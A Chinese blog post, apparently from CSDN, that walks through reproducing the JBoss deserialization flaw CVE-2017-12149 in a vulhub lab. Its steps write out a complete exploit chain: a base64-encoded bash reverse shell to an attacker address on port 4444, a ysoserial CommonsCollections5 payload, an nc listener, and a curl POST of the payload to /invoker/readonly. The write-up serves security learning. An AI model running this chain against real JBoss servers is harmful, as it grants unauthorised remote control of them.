JBoss反序列化漏洞复现 CVE-2017-12149

于 2024-09-11 21:55:35 发布
阅读量133 收藏 2
点赞数 3
分类专栏: 漏洞复现 文章标签: json web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62284238/article/details/142150785
版权

1.准备:

1.1复现环境

漏洞环境:vulnhub靶场

工具准备:ysoserial

1.2环境启动

进入vulnhub目录下的jboss目录,进入CVE-2017-12149目录

cd /home/hbesljx/vulhub/jboss/CVE-2017-12149

docker-compoe启动漏洞环境

docker-compose up -d

访问靶机的8080端口。出现如下即为开启成功!

2.概念说明

JBoss是什么

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。

3.漏洞原理

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

该漏洞出现在`/invoker/readonly`请求中,服务器将用户提交的POST内容进行了Java反序列化。

4.漏洞复现

4.1 编写bash反弹连接的命令

即我们通过反序列化漏洞让靶机执行这条命令

bash -i >& /dev/tcp/192.168.133.130/4444 0>&1

由于Runtime.getRuntime().exec()不能使用管道符等bash需要的方法,因此我们对这个bash命令进行base64编码,再让bash输出base64解码后的命令。就实现了命令执行。

base64加密后让bash输出

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzMy4xMzAvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}'

4.2 使用ysoserial生成payload

使用ysoserial生成包含我们写的bash命令的payload文件

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzMy4xMzAvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

4.3 kali监听本机4444端口

nc -l -p 4444

4.4 发送POC

生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可。

curl 192.168.133.140:8080/invoker/readonly --data-binary @poc.ser

连接成功!

唔熙迪熙
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现Jboss反序列化漏洞CVE-2017-12149
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 870
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
weixin_54626591的博客
05-06 194
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
漏洞复现JBoss反序列化漏洞(CVE-2017-12149)
cj_Hydra's Blog
05-18 2592
前言: JBoss 反序列化漏洞,该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。但近期有安全研究者发现JBossAS 6.x也受该漏洞影响,恶意访问者利用该漏洞无需用户验证即可获得服务器的控制权。该漏洞的细节和验证代码已公开,为避免造成损失,建议及时修复升级至JBossAS 7版本 影响版本:
Jboss反序列化漏洞CVE-2017-12149复现
weixin_43736941的博客
07-24 444
Jboss反序列化漏洞CVE-2017-12149复现 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。漏洞危害程度为高危(High)。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费
CVE-2017-12149-JBoss JMXInvokerServlet 反序列化漏洞
我总结了以下六点......
07-04 834
这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。
JBoss 5.x/6.x 反序列化漏洞复现CVE-2017-12149
qq_40860153的博客
06-14 414
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。2、使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,需要进行一次编码。反弹shell工具,地址:https://github.com/joaomatosf/jexboss。vulhub靶场环境: http://192.168.1.129:8080/
JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)
wutiangui的博客
09-11 412
① ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。所以我们使用 ysoserial 来复现生成序列化数据,并重定向到exp.ser文件。该漏洞存在于http invoker组件的ReadOnlyAccessFilter的doFilter中,在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化。执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。
JBoss反序列漏洞CVE-2017-7504)
weixin_46411728的博客
09-05 1471
JBoss反序列漏洞CVE-2017-7504)
JBoss5.x6.x反序列化漏洞CVE-2017-12149复现学习
hklearner的博客
03-29 2179
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现学习 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞漏洞概要 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
Save OpenAI response in Azure function to Blob storage
suiusoar
09-06 1270
将 OpenAI 的响应保存在 Azure 函数中到 Blob 存储
微信小程序npm扩展能力探究
曹定栓的博客
09-04 1395
小程序支持使用 npm 安装第三方包。
JavaScript前端面试题——深拷贝及浅拷贝
lbcbjtlhmjq的博客
09-05 854
深拷贝和浅拷贝是复制数据结构的两种不同方式。浅拷贝是指创建一个新对象,但仅复制原对象的属性引用,而不是其属性值。即,如果原对象的属性值是对象或数组,浅拷贝后的新对象会引用相同的内存地址,因此修改内层对象会影响到原对象。(简单数据类型拷贝值,引用数据类型拷贝地址)深拷贝是创建一个新的对象,并复制原始对象的所有属性,包括嵌套的对象和数组。这意味着在原始对象或新对象上的更改不会相互影响。
深入解析Go语言中的条件控制与数据处理
一个被知识诅咒的人
09-08 1091
本文详细介绍了Go语言中的switch语句及其在正则表达式匹配中的应用,探讨了如何通过math/big包进行高精度圆周率计算。此外,文章还展示了如何实现一个简易键值对存储系统,并通过encoding/json和encoding/xml包处理常见的JSON和XML数据格式。通过这些示例和知识点,读者将能掌握Go语言中条件控制和数据处理的高级应用,提升编写高效代码的能力。
京东获得JD商品详情 API 返回值说明||京东商品详情数据采集API接口详解
电商数据Girl的博客
09-07 352
请求参数:num_iid=10335871600。参数说明:num_iid:JD商品ID。
Jmeter_循环获取请求接口的字段,并写入文件
最新发布
ramsey17的博客
09-09 480
这里如果使用${__V(mid_${__counter(,)},)}的话,第一个循环(1-20)正常,第二个循环,counter从21开始,因mid不存在而接口请求失败,所以需要使用${__V(mid_${count},)};通过JSON提取器、计数器、beanshell,循环读取邮箱接口的返回字段,筛选出flag为3的收件人,并写入csv文件。10、beanshell处理返回的数据,首先将json转换,获取flag为3的收件人,并写入csv文件;4、配置计数器,与循环控制器一起,起到翻页的作用;
python之异步任务
点点滴滴
09-08 963
在 Python 中,异步任务通常通过使用库如 来实现。 是一个简单、灵活且可靠的分布式系统,用于处理大量消息,同时提供操作控制。在 中, 和 是两种常用的方法来调度异步任务。 是 提供的一个快捷方法,用于简化任务的调用。它会自动将任务标记为异步执行。 方法 提供了更多的控制选项,例如可以指定任务的执行时间、重试策略等。 参数说明 :任务的参数,通常以元组形式传递。 :任务的关键字参数,以字典形式传递。 :任务延迟执行的时间(以秒为单位)。 :任务的预计执行时间(datetime 对象)。 :
CVE-2017-12149漏洞分析
05-30
CVE-2017-12149JBOSS应用服务器中的一个远程代码执行漏洞JBOSS是一款Java EE应用服务器,该漏洞允许攻击者通过HTTP请求发送恶意的序列化对象,从而在目标服务器上执行任意代码。 这个漏洞的原因在于JBOSS中的HTTP Invoker组件没有正确地验证反序列化的对象。攻击者可以通过HTTP请求发送一个恶意的序列化对象,该对象会被反序列化并在服务器上执行代码。攻击者可以利用这个漏洞完全接管服务器,执行任意代码,包括修改、删除、添加文件等操作。 该漏洞影响JBoss Application Server 5.x、6.x和7.x版本。Red Hat已经发布了相关的安全公告和补丁,建议用户及时更新。 总之,CVE-2017-12149漏洞的危害非常严重,对于使用JBOSS应用服务器的用户来说,需要及时关注并采取措施进行修复和防范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值